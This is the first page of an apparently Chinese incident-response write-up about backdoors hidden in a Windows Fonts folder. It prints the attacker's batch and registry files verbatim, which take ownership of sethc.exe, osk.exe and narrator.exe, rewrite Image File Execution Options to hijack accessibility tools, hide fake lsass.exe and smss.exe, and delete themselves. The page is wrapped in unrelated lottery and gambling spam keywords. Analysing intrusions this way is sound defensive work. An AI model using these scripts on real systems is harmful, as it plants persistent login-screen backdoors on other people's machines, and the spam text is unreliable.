手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

记一次应急中发现的诡异事件

来源:本站整理 作者:佚名 时间:2019-06-17 TAG: 我要投稿

0×1 事件概述
在一次应急响应中,无意发现来自不同地区和人员的攻击,两种留后门的方法,截然不同的操作,不同的技术手法。
0×2病毒的温床Fonts
fonts目录常被用于藏匿后门的最佳场所




由于不能直接使用资源管理器进行查看,所以我就选择在dos下打印目录结构进行查看。可以看到这个目录下,有各种各样的“非常规文件”
1.ini-6.ini文件的内容他们是:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe [19]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [7]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe [19]
然后我们继续看该目录下的其他文件
哦买噶的,这个老哥一定是个bat狂魔吧,为什么如此任性。
Aa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
Aaa.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$">>cloud.inf echo.>>cloud.inf echo.[Registry Keys]>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe", 0, "O:BA"secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.logdel cloud.*del %0
aodd.bat
takeown /f %SystemRoot%\system32\osk.exe /a
echo y|cacls %SystemRoot%\system32\osk.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\osk.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\osk.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\osk.exe /e /g system:r
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\lsass.exe
call %systemroot%\Fonts\Aa.bat
%systemroot%\system32\regini 3.ini
%systemroot%\regedit /s %systemroot%\Fonts\lsass.reg
del %systemroot%\Fonts\lsass.reg
call %systemroot%\Fonts\Ss.bat
%systemroot%\system32\regini 4.ini
del 3.ini
del 4.ini
@del %sfxcmd%
@del "%0" >nul
aodi.bat
takeown /f %SystemRoot%\system32\sethc.exe /a
echo y|cacls %SystemRoot%\system32\sethc.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Users:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g Administrators:r
echo y|cacls %SystemRoot%\system32\sethc.exe /e /d SERVICE
echo Y|cacls %SystemRoot%\system32\sethc.exe /e /d "network service"
echo y|cacls %SystemRoot%\system32\sethc.exe /e /g system:r
@echo cd c\:
%systemroot%\system32\attrib +s +h +r %systemroot%\Fonts\smss.exe
call %systemroot%\Fonts\AS.bat
%systemroot%\system32\regini 1.ini
%systemroot%\regedit /s %systemroot%\Fonts\smss.reg
del %systemroot%\Fonts\smss.reg
call %systemroot%\Fonts\SY.bat
%systemroot%\system32\regini 2.ini
del 1.ini
del 2.ini
@del %sfxcmd%
@del "%0" >nul
AS.bat
>>cloud.inf echo.[Version]
>>cloud.inf echo.Signature = "$Chicago$"
>>cloud.inf echo.
>>cloud.inf echo.[Registry Keys]
>>cloud.inf echo."MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", 0, "O:BA"
secedit /configure /db cloud.sdb /cfg cloud.inf /log cloud.log
del cloud.*
del %0
sql.bat
takeown /f %SystemRoot%\system32\narrator.exe /a
echo y|cacls %SystemRoot%\system32\narrator.exe /g Administrators:f
echo y|cacls %SystemRoot%\system32\narrator.exe /e /g Users:r

[1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱[email protected],我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载
        购买彩票权威网址
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中
        中秋嫦娥奔月 Playboy黄金援彩金 山西11选5走势图基本走势 qq游戏没台湾麻将吗 传奇霸业表情包 富勒姆vs曼城预测 北京福利彩票论坛 河北麻将单机版下载 广东快乐十分计划助赢 霍芬海姆vs勒沃库森比分